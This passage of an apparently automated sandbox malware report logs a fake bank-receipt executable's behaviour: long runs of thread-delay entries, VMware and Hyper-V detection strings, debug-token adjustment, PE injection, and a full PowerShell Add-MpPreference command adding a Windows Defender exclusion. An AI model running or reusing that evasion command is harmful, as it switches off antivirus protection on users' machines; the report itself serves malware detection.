Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 599203	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 599093	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 598984	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 598875	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 598765	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 598656	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 598547	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 598436	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 598219	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 598106	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 597891	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 597781	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 597669	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 597559	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 597453	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 597330	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 597055	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 596924	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 596797	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 596687	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 596578	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 596468	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 596359	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 596250	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 596141	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 596016	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 595906	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 595797	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 595687	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 595578	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 595469	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 595359	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 595250	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 595141	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 595029	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 594922	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 594804	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 594703	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 594594	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 594484	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 594375	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 594266	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 594156	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 594047	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 593937	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6599	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3200	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Window / User API: threadDelayed 1933	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Window / User API: threadDelayed 7908	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Window / User API: foregroundWindowGot 1761	Jump to behavior

Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe TID: 7312	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7688	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe TID: 7708	Thread sleep count: 36 > 30	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe TID: 7708	Thread sleep time: -33204139332677172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe TID: 7708	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe TID: 7712	Thread sleep count: 1933 > 30	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe TID: 7712	Thread sleep count: 7908 > 30	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe TID: 7708	Thread sleep time: -599641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe TID: 7708	Thread sleep time: -599531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe TID: 7708	Thread sleep time: -599422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe TID: 7708	Thread sleep time: -599312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe TID: 7708	Thread sleep time: -599203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe TID: 7708	Thread sleep time: -599093s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe TID: 7708	Thread sleep time: -598984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe TID: 7708	Thread sleep time: -598875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe TID: 7708	Thread sleep time: -598765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe TID: 7708	Thread sleep time: -598656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe TID: 7708	Thread sleep time: -598547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe TID: 7708	Thread sleep time: -598436s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe TID: 7708	Thread sleep time: -598328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe TID: 7708	Thread sleep time: -598219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe TID: 7708	Thread sleep time: -598106s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe TID: 7708	Thread sleep time: -598000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe TID: 7708	Thread sleep time: -597891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe TID: 7708	Thread sleep time: -597781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe TID: 7708	Thread sleep time: -597669s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe TID: 7708	Thread sleep time: -597559s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe TID: 7708	Thread sleep time: -597453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe TID: 7708	Thread sleep time: -597330s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe TID: 7708	Thread sleep time: -597055s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe TID: 7708	Thread sleep time: -596924s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe TID: 7708	Thread sleep time: -596797s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe TID: 7708	Thread sleep time: -596687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe TID: 7708	Thread sleep time: -596578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe TID: 7708	Thread sleep time: -596468s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe TID: 7708	Thread sleep time: -596359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe TID: 7708	Thread sleep time: -596250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe TID: 7708	Thread sleep time: -596141s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe TID: 7708	Thread sleep time: -596016s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe TID: 7708	Thread sleep time: -595906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe TID: 7708	Thread sleep time: -595797s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe TID: 7708	Thread sleep time: -595687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe TID: 7708	Thread sleep time: -595578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe TID: 7708	Thread sleep time: -595469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe TID: 7708	Thread sleep time: -595359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe TID: 7708	Thread sleep time: -595250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe TID: 7708	Thread sleep time: -595141s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe TID: 7708	Thread sleep time: -595029s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe TID: 7708	Thread sleep time: -594922s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe TID: 7708	Thread sleep time: -594804s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe TID: 7708	Thread sleep time: -594703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe TID: 7708	Thread sleep time: -594594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe TID: 7708	Thread sleep time: -594484s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe TID: 7708	Thread sleep time: -594375s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe TID: 7708	Thread sleep time: -594266s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe TID: 7708	Thread sleep time: -594156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe TID: 7708	Thread sleep time: -594047s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe TID: 7708	Thread sleep time: -593937s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 599531	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 599312	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 599203	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 599093	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 598984	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 598875	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 598765	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 598656	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 598547	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 598436	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 598219	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 598106	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 597891	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 597781	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 597669	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 597559	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 597453	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 597330	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 597055	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 596924	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 596797	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 596687	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 596578	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 596468	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 596359	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 596250	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 596141	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 596016	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 595906	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 595797	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 595687	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 595578	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 595469	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 595359	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 595250	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 595141	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 595029	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 594922	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 594804	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 594703	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 594594	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 594484	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 594375	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 594266	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 594156	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 594047	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 593937	Jump to behavior

Source: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000000.00000002.1388647822.0000000008700000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e696
Source: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000000.00000002.1388647822.000000000875E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000006.00000002.3798542739.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll*
Source: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000000.00000002.1388647822.000000000875E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}5

Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe"
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe"			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe

Memory written: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe"	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process created: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe "C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe"	Jump to behavior
